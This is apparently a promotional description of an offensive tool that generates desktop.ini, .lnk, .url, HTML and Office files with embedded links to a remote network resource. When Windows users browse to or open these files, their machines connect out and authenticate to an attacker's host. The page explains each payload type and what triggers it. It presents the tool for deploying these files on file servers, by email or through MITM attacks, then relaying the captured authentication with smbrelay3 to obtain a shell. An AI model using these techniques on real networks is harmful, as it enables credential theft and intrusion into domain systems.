Hacking is not always about breaking systems with remote execution vulnerabilities.
This time we are going to use a different approach.
Imagine that you are connected to a domain network and somehow, you are able to
deliver files to the network, for example writing files to a heavily used fileserver,
sending documents by email to network users or executing MITM attacks against HTTP
Trafic. If you are able to do it, then you only need a way to force network computers
to connect to the host of your choice.
Our Network payload generation
provides new ways that you can use to attack
those networks as it is able to deploy several kind of content that will force the
remote computers to connect to the designated target and authenticate themselves
on behalf of the logged user. At that point there are lots of ways to exploit those
systems like sniffing, executing namedpipes
or the new smbrelay3
Our payload generation tool is able to generate and deploy several files like desktop.ini,
lnk files, url files, html/office documents with embedded links to a remote resource.
Those embedded links are automatically handled by Microsoft explorer and there is
no way to disable it.
The -t parameter specifies what kind of payload is going to be used. Examples:
* d1: Iconfile - desktop.ini:
The IconFile parameter points to a network
resource. When you access a filesystem folder and that desktop.ini is stored on
a subfolder, explorer.exe will automatically connect to the network and send user
* d2: LocalizedResourceName - desktop.ini:
points to a network resource. Works with folder/subfolder
* d3: InfoTip - desktop.ini:
points to a network resource.
Works when selecting the folder
* d4: desktop.ini - desktop.ini:
points to a network
resource. Works when entering the folder
* d0: All - desktop.ini:
Deploy all desktop.ini known payloads at once to
ensure that the remote target is engaged.
InfoTip=Proof of concept for desktop redirect - http://www.tarasco.org
* u: url file:
Deploy a .url file, that works as an lnk file. The target
points to a network service.
* l: url file:
Deploy a .lnk file. This is a void builtin lnk file that contains
a CUSTOMICON parameter (flag & 128) pointing to a network service.
* h: html file:
Deploy a .html file with an LINK REL="stylesheet"
pointing to a network service .
* o: office file:
Deploy a .pps file with a LINK REL="stylesheet"
html code pointing to a network service. You can rename the file extension to .doc,.ppt,.pps,.xls,..
parameter is optional and points to the directory where the payload
is going to be saved.
You can use this tool to deploy payloads and attack a network pipe created by the
or replay SMB or HTTP traffic
to a designated target to get a shell with smbrelay3
You can browse online the source code
(Windows executable + Source code)